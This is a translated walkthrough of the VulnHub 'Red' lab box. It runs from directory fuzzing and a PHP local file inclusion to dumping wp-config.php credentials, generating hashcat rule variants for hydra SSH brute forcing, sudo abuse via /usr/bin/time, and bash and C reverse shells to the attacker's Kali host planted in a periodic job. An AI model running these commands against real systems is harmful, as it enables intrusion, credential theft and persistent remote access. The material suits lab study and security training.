VulnHub box: Red.ova

Published 2023-06-26 11:00:43, author: 我还没有吃饭

Box download: Red: 1 ~ VulnHub

Kali: 172.88.6.144

Target: 172.88.6.70

This is the box's console. The first time round I could not find its IP; switching the VM to bridged networking and sweeping the subnet found it:

nmap 172.88.6.0/24

Browsing to the IP:


I spent a long time without finding anything useful. Looking at the page source I found a hostname, redrocks.win, which would not load on its own, so I added it to the hosts file on Kali (172.88.6.70 redrocks.win).


The source of the front page showed nothing, but after clicking around and viewing the source again I found a sentence.

Translated, it says the site has been hacked. Searching for Miessler: Daniel Miessler maintains SecLists, which is where the wordlists used below come from.


Brute-force directories on the host:

gobuster dir -u http://redrocks.win -t 40 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

That was too slow, so I switched wordlists:

gobuster dir -u http://redrocks.win -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt

For some reason the scan did not turn it up for me, but NetworkFileManagerPHP.php must be there for a purpose, so fuzz its parameter names with wfuzz:

wfuzz -c -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test' -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt

Oddly, my run never found "key".

Taking a shortcut and trying a classic traversal payload on the key parameter:

http://redrocks.win/NetworkFileManagerPHP.php?key=../../../../etc/passwd    Curiously this URL does nothing from the physical host but works from Kali, which makes sense: the hosts entry for redrocks.win exists only on Kali.


http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=NetworkFileManagerPHP.php

This returns the script's own source, base64-encoded instead of executed:

PD9waHAKICAgJGZpbGUgPSAkX0dFVFsna2V5J107CiAgIGlmKGlzc2V0KCRmaWxlKSkKICAgewogICAgICAgaW5jbHVkZSgiJGZpbGUiKTsKICAgfQogICBlbHNlCiAgIHsKICAgICAgIGluY2x1ZGUoIk5ldHdvcmtGaWxlTWFuYWdlclBIUC5waHAiKTsKICAgfQogICAvKiBWR2hoZENCd1lYTnpkMjl5WkNCaGJHOXVaU0IzYjI0bmRDQm9aV3h3SUhsdmRTRWdTR0Z6YUdOaGRDQnpZWGx6SUhKMWJHVnpJR0Z5WlNCeWRXeGxjdz09ICovCj8
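As an added example (not from the original post and not the box's own code), the following Python decodes that blob, confirms that the script hands the key parameter straight to include(), and pulls out the second base64 string hidden inside the PHP comment, which is where the hint used later in this writeup comes from. The endpoint and the blob are the ones above; the function names are my own, and the paste lost its trailing "=" padding, so the decoder re-pads before decoding.

```python
import base64
import re
from typing import Optional

# Endpoint and parameter from the post.
LFI_ENDPOINT = "http://redrocks.win/NetworkFileManagerPHP.php"

# php://filter response from the post, copied verbatim. The paste lost its trailing
# "=" padding (and the closing "?>"), so it is re-padded before decoding.
FILTER_OUTPUT = (
    "PD9waHAKICAgJGZpbGUgPSAkX0dFVFsna2V5J107CiAgIGlmKGlzc2V0KCRmaWxlKSkKICAgewog"
    "ICAgICAgaW5jbHVkZSgiJGZpbGUiKTsKICAgfQogICBlbHNlCiAgIHsKICAgICAgIGluY2x1ZGUo"
    "Ik5ldHdvcmtGaWxlTWFuYWdlclBIUC5waHAiKTsKICAgfQogICAvKiBWR2hoZENCd1lYTnpkMjl5"
    "WkNCaGJHOXVaU0IzYjI0bmRDQm9aV3h3SUhsdmRTRWdTR0Z6YUdOaGRDQnpZWGx6SUhKMWJHVnpJ"
    "R0Z5WlNCeWRXeGxjdz09ICovCj8"
)


def filter_url(endpoint: str, resource: str, param: str = "key") -> str:
    """Build the php://filter URL that returns a file base64-encoded instead of
    executing it, which is how the script's own PHP source can be read."""
    return f"{endpoint}?{param}=php://filter/read=convert.base64-encode/resource={resource}"


def _b64decode_lenient(data: str) -> str:
    """Base64-decode text that may have lost whitespace or '=' padding."""
    clean = re.sub(r"\s+", "", data)
    clean += "=" * (-len(clean) % 4)
    return base64.b64decode(clean).decode("utf-8", errors="replace")


def decode_filter_output(blob: str) -> str:
    """Recover the PHP source from a php://filter convert.base64-encode response."""
    return _b64decode_lenient(blob)


def find_hidden_hint(php_source: str) -> Optional[str]:
    """Return the decoded text of the first base64 string hidden in a /* ... */ comment,
    or None if there is none."""
    m = re.search(r"/\*\s*([A-Za-z0-9+/]+={0,2})\s*\*/", php_source)
    return _b64decode_lenient(m.group(1)) if m else None


def uses_unsanitised_include(php_source: str) -> bool:
    """Flag the LFI pattern: a request parameter handed straight to include()."""
    takes_input = re.search(r"\$_(GET|POST|REQUEST)\[", php_source) is not None
    raw_include = re.search(r'include\(\s*"?\$\w+"?\s*\)', php_source) is not None
    return takes_input and raw_include


if __name__ == "__main__":
    print("request:", filter_url(LFI_ENDPOINT, "NetworkFileManagerPHP.php"))
    src = decode_filter_output(FILTER_OUTPUT)
    print(src)
    print("parameter reaches include() unsanitised:", uses_unsanitised_include(src))
    print("hidden hint:", find_hidden_hint(src))
```

The decoded source is a textbook include($_GET['key']) with no path restriction, which is why both the traversal payload and the php://filter wrapper work against it; the comment decodes to the sentence about hashcat rules that becomes important once the database password fails over SSH.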

Read wp-config.php the same way: http://redrocks.win/NetworkFileManagerPHP.php?key=php://filter/read=convert.base64-encode/resource=wp-config.php. Base64-decoding the response gives the MySQL username and password: john / R3v_m4lwh3r3_k1nG!!


Decoded, it reads:

<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );

/** MySQL database username */
define( 'DB_USER', 'john' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

define('FS_METHOD', 'direct');

define('WP_SITEURL', 'http://redrocks.win');
define('WP_HOME', 'http://redrocks.win');

/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', '2uuBvc8SO5{>UwQ<^5V5[UHBw%N}-BwWqw|><*HfBwJ( $&%,(Zbg/jwFkRHf~v|');
define('SECURE_AUTH_KEY', 'ah}<I`52GL6C^@


With database credentials in hand, I remembered that /etc/passwd listed a john account, so I tried them over SSH. That failed. Then I thought about the hint hidden in the script's source: "That password alone won't help you! Hashcat says rules are rules". So the real password is a variant of this one produced by a hashcat rule set. The rule file used is best64.rule, a widely used general-purpose rule set; the name has nothing to do with base64 encoding, even though the source was read through a base64 filter. Running hashcat in --stdout mode with the rule file prints every mutation of the base word instead of cracking a hash:

 

hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt

pass.txt contains the single line R3v_m4lwh3r3_k1nG!!

// pass.txt holds the password read from the config file; passlist.txt is the list of candidates the rules generate
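To show what "rules are rules" means in practice, here is a small Python engine, added here and not taken from the original post or from hashcat, that implements a subset of hashcat's rule functions and applies a rule list to a base word the way hashcat --stdout -r does. BASE_PASSWORD is the value from wp-config.php; SAMPLE_RULES is a constructed list in hashcat syntax and is not the contents of best64.rule (pass that file on the command line to use the real set; rule functions outside this subset are skipped). The script name rules_demo.py in the usage line is my own.

```python
import sys

# Base password recovered from wp-config.php (from the post).
BASE_PASSWORD = "R3v_m4lwh3r3_k1nG!!"

# Constructed sample rules in hashcat syntax: an illustration only, NOT the
# contents of best64.rule (pass that file on the command line to use the real set).
SAMPLE_RULES = [":", "l", "u", "c", "t", "r", "d", "f", "T0", "$1", "$2 $3",
                "^!", "[", "]", "{", "}", "se3", "sa@ $1"]

# Argument-less rule functions: single character -> transform.
SIMPLE = {
    ":": lambda w: w,                              # no-op, emit the word unchanged
    "l": str.lower,
    "u": str.upper,
    "c": lambda w: w[:1].upper() + w[1:].lower(),  # capitalize first, lower the rest
    "t": str.swapcase,                             # toggle case of every char
    "r": lambda w: w[::-1],                        # reverse
    "d": lambda w: w + w,                          # duplicate
    "f": lambda w: w + w[::-1],                    # reflect
    "{": lambda w: w[1:] + w[:1],                  # rotate left
    "}": lambda w: w[-1:] + w[:-1],                # rotate right
    "[": lambda w: w[1:],                          # delete first char
    "]": lambda w: w[:-1],                         # delete last char
}


def _pos(ch):
    """hashcat positional arguments are 0-9 then A-Z (10..35)."""
    return int(ch, 36)


def apply_rule(word, rule):
    """Apply one hashcat rule line to word: a sequence of single-character
    functions, some taking arguments; whitespace between functions is ignored."""
    w, i = word, 0
    while i < len(rule):
        f = rule[i]
        if f in " \t":
            pass
        elif f in SIMPLE:
            w = SIMPLE[f](w)
        elif f == "$":                                 # $X: append X
            i += 1
            w = w + rule[i]
        elif f == "^":                                 # ^X: prepend X
            i += 1
            w = rule[i] + w
        elif f == "T":                                 # TN: toggle case at position N
            i += 1
            n = _pos(rule[i])
            if n < len(w):
                w = w[:n] + w[n].swapcase() + w[n + 1:]
        elif f == "s":                                 # sXY: replace every X with Y
            w = w.replace(rule[i + 1], rule[i + 2])
            i += 2
        elif f == "@":                                 # @X: purge every X
            i += 1
            w = w.replace(rule[i], "")
        else:
            raise ValueError(f"unsupported rule function {f!r} in rule {rule!r}")
        i += 1
    return w


def load_rules(text):
    """Parse rule-file text into rule lines, skipping '#' comments and blanks."""
    lines = (ln.strip() for ln in text.splitlines())
    return [ln for ln in lines if ln and not ln.startswith("#")]


def generate_candidates(base, rules, skip_unsupported=True):
    """Mimic `hashcat --stdout base.txt -r rules.rule`: apply every rule to the base
    word in file order. Unlike hashcat, duplicates are dropped so hydra's list stays short."""
    seen, out = set(), []
    for r in rules:
        try:
            cand = apply_rule(base, r)
        except (ValueError, IndexError):
            if skip_unsupported:                      # real rule files use functions beyond this subset
                continue
            raise
        if cand and cand not in seen:
            seen.add(cand)
            out.append(cand)
    return out


if __name__ == "__main__":
    # python3 rules_demo.py [/usr/share/hashcat/rules/best64.rule] > passlist.txt
    rules = load_rules(open(sys.argv[1]).read()) if len(sys.argv) > 1 else SAMPLE_RULES
    for cand in generate_candidates(BASE_PASSWORD, rules):
        print(cand)
```

Because every candidate is a deterministic function of the base word and one rule line, the list is small enough for hydra to try in seconds, which is what makes the later "re-run hydra after being kicked out" step cheap. hashcat itself keeps duplicate outputs; this version drops them.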

Using the generated list works, but there is a catch: the box appears to change john's password every minute or two, and if you sit idle the session is dropped and you need the new one.

(The screenshot above was taken after I had already dealt with this, so that session no longer gets kicked.)

hydra -l john -P passlist.txt 172.88.6.70 ssh

Every time the session is dropped, the same hydra run against the generated list turns up the current password.

There are a few ways to stop being kicked out. The first (which I did not get working) is a reverse shell: open another terminal on Kali with nc -lvnp 6688 (any free port will do), then run this on the box:

bash -i >& /dev/tcp/172.88.6.144/6688 0>&1

and upgrade the shell that arrives on the listener to a full tty:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm        # then press Ctrl+Z to background the shell
stty raw -echo;fg        # type reset if the terminal looks garbled
stty rows 46 columns 188

The second way, which also needs a listener on Kali (nc -lvnp 6688), starts from an SSH login as john:

ssh john@172.88.6.70

john@172.88.6.70's password:
Last login: Sun Jun 25 14:22:01 2023 from 172.88.6.144      (password accepted)

cd /dev/shm

vi shell.sh

Write a reverse shell into it; cat shell.sh should show:

#!/bin/bash
bash -i >& /dev/tcp/172.88.6.144/6688 0>&1

john is allowed to run /usr/bin/time as ippsec through sudo, and time will launch whatever program it is given, so use it to get a bash as ippsec and run the script from there:

sudo -u ippsec /usr/bin/time /bin/bash

bash /dev/shm/shell.sh

The shell now lands on the nc -lvnp 6688 listener.

To keep it stable and avoid being kicked out, run python3 -c 'import pty;pty.spawn("/bin/bash")' in the reverse shell; I typed it twice.

Then fetch pspy: wget https://github.com/DominicBreuker/pspy/releases/tag/v1.2.0 (note that this URL is the release page; the binary to run on the box is the pspy64 asset attached to that release).

If the box cannot download it, download it on the physical host and move it over. The process:

1. On the physical host open https://github.com/DominicBreuker/pspy/releases/tag/v1.2.0 and download it.

2. Set up a shared folder between the VM and the physical host; see: How to set up a VirtualBox shared folder (嵌入式李's blog on CSDN).

3. Start Apache on Kali: open a terminal and run sudo service apache2 start

4. Put the file under /var/www/html/

5. Write supersecretfileuc.c: go to https://www.revshells.com/, pick the C reverse shell, and compile it in a terminal with gcc supersecretfileuc.c -o dev. Note that supersecretfileuc.c is the reverse-shell source and dev is the compiled binary.

Now delete the two files already on the box, dev and supersecretfileuc.c, and fetch the reverse-shell versions from Kali's web server under the same names into that .git directory, so that the periodic job pspy was fetched to spot runs the replacement:

wget 172.88.6.144/dev

wget 172.88.6.144/supersecretfileuc.c

Then let the job run: start another listener on Kali, nc -lvnp 6666 (the port compiled into the C reverse shell), and after about two minutes it connects.


This box was a bit hard for me; there are still many details I do not understand, and I did not manage the screenshots (not that I didn't want to, they got eaten).

To sum up:

1. hashcat, gobuster, wfuzz, hydra, and plenty more.

2. Practice more, and come back to this box later.